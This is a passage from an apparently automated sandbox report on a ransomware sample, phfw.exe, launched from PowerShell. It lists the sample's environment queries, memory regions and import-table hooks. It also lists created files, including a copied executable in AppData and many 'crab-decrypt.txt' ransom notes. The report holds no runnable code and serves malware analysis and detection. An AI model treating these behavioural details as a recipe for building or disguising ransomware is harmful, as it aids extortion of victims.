Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Get Info type = System Directory, result_out = C:\WINDOWS\system32 True 3
Fn
Get Info type = Hardware Information True 2
Fn
Environment (43)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 24
Fn
Get Environment String name = PinnableBufferCache_System.Threading.OverlappedData_Disabled False 1
Fn
Get Environment String name = PinnableBufferCache_System.Threading.OverlappedData_MinCount False 1
Fn
Get Environment String name = PathEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 1
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules True 3
Fn
Get Environment String name = USERPROFILE, result_out = C:\Users\FD1HVy True 2
Fn
Get Environment String name = PSModuleAutoLoadingPreference False 4
Fn
Get Environment String name = PATH True 1
Fn
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps;;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 2
Fn
Get Environment String name = PSModuleAnalysisCachePath False 1
Fn
Get Environment String name = PSDisableModuleAnalysisCacheCleanup False 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
Process #6: phfw.exe
1899 22
»
Information Value
ID #6
File Name c:\users\fd1hvy\appdata\local\temp\phfw.exe
Command Line "C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe"
Initial Working Directory C:\Users\FD1HVy\Documents\
Monitor Start Time: 00:01:11, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:04:35
OS Process Information
»
Information Value
PID 0xc0c
Parent PID 0x5e0 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x FE0
0x C68
0x 10E8
0x F8C
0x 121C
0x 123C
0x 103C
0x 19C
0x 13D0
0x 1310
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000040000 0x00040000 0x00057fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x0006ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00083fff Private Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000070000 0x00070000 0x0007afff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000090000 0x00090000 0x0009afff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00151fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000130000 0x00130000 0x0013afff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory Readable, Writable True False False -
counters2.dat 0x00150000 0x00150fff Memory Mapped File Readable, Writable True True False
pagefile_0x0000000000160000 0x00160000 0x0016afff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x0019ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001b0fff Private Memory Readable, Writable True False False -
private_0x00000000001c0000 0x001c0000 0x001fffff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x003fffff Private Memory Readable, Writable True False False -
phfw.exe 0x00400000 0x00557fff Memory Mapped File Readable, Writable, Executable True True False
locale.nls 0x00560000 0x00624fff Memory Mapped File Readable False False False -
private_0x0000000000630000 0x00630000 0x00630fff Private Memory Readable, Writable True False False -
winnlsres.dll 0x00640000 0x00644fff Memory Mapped File Readable False False False -
pagefile_0x0000000000650000 0x00650000 0x00651fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000660000 0x00660000 0x00660fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000670000 0x00670000 0x0067ffff Private Memory Readable, Writable True False False -
winnlsres.dll.mui 0x00680000 0x0068ffff Memory Mapped File Readable False False False -
private_0x0000000000690000 0x00690000 0x006b3fff Private Memory Readable, Writable True False False -
private_0x0000000000690000 0x00690000 0x006a6fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000006b0000 0x006b0000 0x006b0fff Private Memory Readable, Writable True False False -
private_0x00000000006c0000 0x006c0000 0x007bffff Private Memory Readable, Writable True False False -
private_0x00000000007c0000 0x007c0000 0x008bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000008c0000 0x008c0000 0x00ac7fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000ad0000 0x00ad0000 0x00c50fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000c60000 0x00c60000 0x0205ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002060000 0x02060000 0x0219ffff Private Memory Readable, Writable True False False -
private_0x0000000002060000 0x02060000 0x0209ffff Private Memory Readable, Writable True False False -
private_0x00000000020a0000 0x020a0000 0x020a0fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000020a0000 0x020a0000 0x020dffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000020a0000 0x020a0000 0x020a2fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000020b0000 0x020b0000 0x020b0fff Pagefile Backed Memory Readable True False False -
private_0x00000000020c0000 0x020c0000 0x020c2fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000020c0000 0x020c0000 0x020c0fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000020c0000 0x020c0000 0x020c8fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000020d0000 0x020d0000 0x0210ffff Private Memory Readable, Writable True False False -
private_0x00000000020e0000 0x020e0000 0x020e0fff Private Memory Readable, Writable True False False -
private_0x0000000002110000 0x02110000 0x0214ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002150000 0x02150000 0x02150fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000002160000 0x02160000 0x0216ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002170000 0x02170000 0x02187fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002190000 0x02190000 0x0219ffff Private Memory Readable, Writable True False False -
private_0x00000000021a0000 0x021a0000 0x0231ffff Private Memory Readable, Writable True False False -
private_0x00000000021a0000 0x021a0000 0x022fffff Private Memory Readable, Writable True False False -
private_0x00000000021a0000 0x021a0000 0x0229ffff Private Memory Readable, Writable True False False -
private_0x00000000022a0000 0x022a0000 0x022dffff Private Memory Readable, Writable True False False -
private_0x00000000022e0000 0x022e0000 0x022e0fff Private Memory Readable, Writable True False False -
private_0x00000000022f0000 0x022f0000 0x022fffff Private Memory Readable, Writable True False False -
private_0x0000000002300000 0x02300000 0x02300fff Private Memory Readable, Writable True False False -
private_0x0000000002300000 0x02300000 0x02301fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002310000 0x02310000 0x0231ffff Private Memory Readable, Writable True False False -
private_0x0000000002320000 0x02320000 0x0241ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02420000 0x02756fff Memory Mapped File Readable False False False -
pagefile_0x0000000002760000 0x02760000 0x02b5ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002b60000 0x02b60000 0x02c5ffff Private Memory Readable, Writable True False False -
private_0x0000000002c60000 0x02c60000 0x02d5ffff Private Memory Readable, Writable True False False -
private_0x0000000002d60000 0x02d60000 0x02e5ffff Private Memory Readable, Writable True False False -
private_0x0000000002e60000 0x02e60000 0x02f5ffff Private Memory Readable, Writable True False False -
private_0x0000000002f60000 0x02f60000 0x02f9ffff Private Memory Readable, Writable True False False -
private_0x0000000002f60000 0x02f60000 0x02f60fff Private Memory Readable, Writable True False False -
private_0x0000000002f70000 0x02f70000 0x02f70fff Private Memory Readable, Writable True False False -
private_0x0000000002fa0000 0x02fa0000 0x02fa0fff Private Memory Readable, Writable True False False -
wow64.dll 0x70200000 0x70250fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x70260000 0x702d2fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x702e0000 0x702e9fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73370000 0x73377fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x73380000 0x733c9fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x733d0000 0x7344efff Memory Mapped File Readable, Writable, Executable False False False -
msiso.dll 0x73450000 0x734b0fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x734c0000 0x7365bfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73660000 0x73667fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73670000 0x736bdfff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x736c0000 0x7376cfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73770000 0x7379efff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x737a0000 0x737b4fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x737c0000 0x739d1fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x739e0000 0x73a01fff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73a10000 0x73a27fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x73a30000 0x73a5efff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x73a60000 0x73a72fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x73a80000 0x73d40fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x73d50000 0x73e0efff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x73ec0000 0x73f52fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73f60000 0x73f69fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73f70000 0x73f8ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x73f90000 0x73fb0fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x73fc0000 0x73fc5fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x74020000 0x74137fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x74140000 0x75487fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75490000 0x7555ffff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x75560000 0x7556dfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75570000 0x75594fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75610000 0x75702fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32full.dll 0x75710000 0x75867fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75960000 0x75a1cfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x75a20000 0x75a2ffff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x75a30000 0x75a74fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75a80000 0x75bbbfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75bc0000 0x75bc6fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75bd0000 0x75c14fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp_win.dll 0x75c20000 0x75c98fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75ca0000 0x75e61fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75e70000 0x75f05fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x76060000 0x765e3fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x765f0000 0x76646fff Memory Mapped File Readable, Writable, Executable False False False -
win32u.dll 0x767c0000 0x767d5fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x767e0000 0x76a17fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76b10000 0x76b50fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76b60000 0x76cdcfff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x76ce0000 0x76cedfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x76cf0000 0x76d66fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76d70000 0x76e2ffff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x76e30000 0x76e68fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x77310000 0x7739bfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x773a0000 0x77406fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x774a0000 0x7762dfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff9dddaffff Private Memory Readable True False False -
ntdll.dll 0x7ff9dddb0000 0x7ff9ddf8afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9ddf8b000 0x7ff9ddf8b000 0x7ffffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 53 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000006c0000:+0x1b974 14. entry of phfw.exe 4 bytes private_0x00000000007c0000:+0x601e5 now points to private_0x000000007fff0000:+0x4f8301e5
IAT private_0x00000000006c0000:+0x1b974 15. entry of phfw.exe 4 bytes pagefile_0x00000000008c0000:+0x26c1a now points to private_0x000000007fff0000:+0x5a8f6c1a
IAT private_0x00000000006c0000:+0x1b974 17. entry of phfw.exe 4 bytes phfw.exe:+0x12c130 now points to private_0x000000007fff0000:+0x5b53c130
IAT private_0x00000000006c0000:+0x1b974 19. entry of phfw.exe 4 bytes pagefile_0x0000000000c60000:+0x28c659 now points to private_0x000000007fff0000:+0x4fefc659
IAT private_0x00000000006c0000:+0x1b974 20. entry of phfw.exe 4 bytes pagefile_0x0000000000c60000:+0xec5cd now points to private_0x000000007fff0000:+0x46d5c5cd
IAT private_0x00000000006c0000:+0x1b974 21. entry of phfw.exe 4 bytes locale.nls:+0x24558 now points to private_0x000000007fff0000:+0x9594558
IAT private_0x00000000006c0000:+0x1b974 22. entry of phfw.exe 4 bytes pagefile_0x0000000000c60000:+0x13a9fc now points to private_0x000000007fff0000:+0xbdaa9fc
IAT private_0x00000000006c0000:+0x1b974 25. entry of phfw.exe 4 bytes pagefile_0x0000000000ad0000:+0x1588d1 now points to private_0x000000007fff0000:+0xdc388d1
IAT private_0x00000000006c0000:+0x1b974 26. entry of phfw.exe 4 bytes private_0x00000000001c0000:+0x7ed1 now points to private_0x000000007fff0000:+0x191d7ed1
IAT private_0x00000000006c0000:+0x1b974 29. entry of phfw.exe 4 bytes pagefile_0x0000000000ad0000:+0x40c now points to private_0x000000007fff0000:+0x46ae040c
IAT private_0x00000000006c0000:+0x1b974 33. entry of phfw.exe 4 bytes private_0x00000000000a0000:+0x25605 now points to private_0x000000007fff0000:+0xb0d5605
IAT private_0x00000000006c0000:+0x1b974 35. entry of phfw.exe 4 bytes private_0x00000000006c0000:+0xbc697 now points to private_0x000000007fff0000:+0x5078c697
IAT private_0x00000000006c0000:+0x1b974 36. entry of phfw.exe 4 bytes private_0x0000000000200000:+0x125d7d now points to private_0x000000007fff0000:+0x49335d7d
IAT private_0x00000000006c0000:+0x1b974 37. entry of phfw.exe 4 bytes private_0x00000000007c0000:+0x4c943 now points to private_0x000000007fff0000:+0x5481c943
IAT private_0x00000000006c0000:+0x1b974 38. entry of phfw.exe 4 bytes locale.nls:+0x85c50 now points to private_0x000000007fff0000:+0x615f5c50
IAT private_0x00000000006c0000:+0x1b974 40. entry of phfw.exe 4 bytes pagefile_0x0000000000c60000:+0x19c7c6 now points to private_0x000000007fff0000:+0x43e0c7c6
IAT private_0x00000000006c0000:+0x1b974 41. entry of phfw.exe 4 bytes pagefile_0x0000000000c60000:+0x88e57 now points to private_0x000000007fff0000:+0xcf8e57
IAT private_0x00000000006c0000:+0x1b974 43. entry of phfw.exe 4 bytes private_0x00000000000a0000:+0x57b5c now points to private_0x0000000002060000:+0x97b5c
IAT private_0x00000000006c0000:+0x1b974 46. entry of phfw.exe 4 bytes phfw.exe:+0x115ceb now points to private_0x000000007fff0000:+0x8525ceb
IAT private_0x00000000006c0000:+0x1b974 47. entry of phfw.exe 4 bytes private_0x00000000007c0000:+0xeff67 now points to private_0x000000007fff0000:+0x738bff67
IAT private_0x00000000006c0000:+0x1b974 49. entry of phfw.exe 4 bytes private_0x00000000000a0000:+0xb02af now points to private_0x000000007fff0000:+0x271602af
IAT private_0x00000000006c0000:+0x1b974 50. entry of phfw.exe 4 bytes pagefile_0x00000000008c0000:+0x10ec3 now points to private_0x000000007fff0000:+0x768e0ec3
IAT private_0x00000000006c0000:+0x1b974 54. entry of phfw.exe 4 bytes phfw.exe:+0x25782 now points to private_0x000000007fff0000:+0x1e435782
IAT private_0x00000000006c0000:+0x1b974 59. entry of phfw.exe 4 bytes private_0x00000000000a0000:+0x1604b now points to private_0x000000007fff0000:+0x6c0c604b
IAT private_0x00000000006c0000:+0x1b974 61. entry of phfw.exe 4 bytes pagefile_0x0000000000c60000:+0x338a13 now points to private_0x000000007fff0000:+0x1dfa8a13
IAT private_0x00000000006c0000:+0x1b974 62. entry of phfw.exe 4 bytes pagefile_0x00000000008c0000:+0xb04fc now points to private_0x000000007fff0000:+0x489804fc
IAT private_0x00000000006c0000:+0x1b974 64. entry of phfw.exe 4 bytes pagefile_0x00000000008c0000:+0xf06fa now points to private_0x000000007fff0000:+0x359c06fa
IAT private_0x00000000006c0000:+0x1b974 65. entry of phfw.exe 4 bytes private_0x00000000000a0000:+0x5130b now points to private_0x000000007fff0000:+0xf10130b
IAT private_0x00000000006c0000:+0x1b974 70. entry of phfw.exe 4 bytes phfw.exe:+0xecd76 now points to private_0x000000007fff0000:+0x4f4fcd76
IAT private_0x00000000006c0000:+0x1b974 72. entry of phfw.exe 4 bytes phfw.exe:+0xcc665 now points to private_0x000000007fff0000:+0x784dc665
IAT private_0x00000000006c0000:+0x1b974 76. entry of phfw.exe 4 bytes phfw.exe:+0xad46a now points to private_0x000000007fff0000:+0x6a4bd46a
IAT private_0x00000000006c0000:+0x1b974 79. entry of phfw.exe 4 bytes private_0x00000000006c0000:+0x26377 now points to private_0x000000007fff0000:+0x436f6377
IAT private_0x00000000006c0000:+0x1b974 80. entry of phfw.exe 4 bytes pagefile_0x0000000000010000:+0xf367 now points to private_0x000000007fff0000:+0x7602f367
IAT private_0x00000000006c0000:+0x1b974 83. entry of phfw.exe 4 bytes phfw.exe:+0xc8c0d now points to private_0x000000007fff0000:+0x7c4d8c0d
IAT private_0x00000000006c0000:+0x1b974 84. entry of phfw.exe 4 bytes private_0x0000000000060000:+0xf45a now points to private_0x000000007fff0000:+0x7707f45a
IAT private_0x00000000006c0000:+0x1b974 86. entry of phfw.exe 4 bytes locale.nls:+0x97dc1 now points to private_0x000000007fff0000:+0x7607dc1
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe 255.01 KB MD5: e715ecd8129977094f9e31bc42da0090
SHA1: 16acd6b38bbe74e3288ee0ae8640fcffa6c31c08
SHA256: f4c0e3d6639404086afc0219e7a99a3e74937668e148d20acd8a259bc88ff559
False
c:\users\fd1hvy\appdata\local\virtualstore\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\$getcurrent\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\$getcurrent\logs\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\$getcurrent\safeos\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\$recycle.bin\s-1-5-21-1051304884-625712362-2192934891-1000\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1025\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1028\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1029\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1030\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1031\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1032\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1033\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1035\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1036\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1037\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1038\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1040\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1041\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1042\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1043\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1044\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1045\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1046\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1049\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1053\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\1055\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
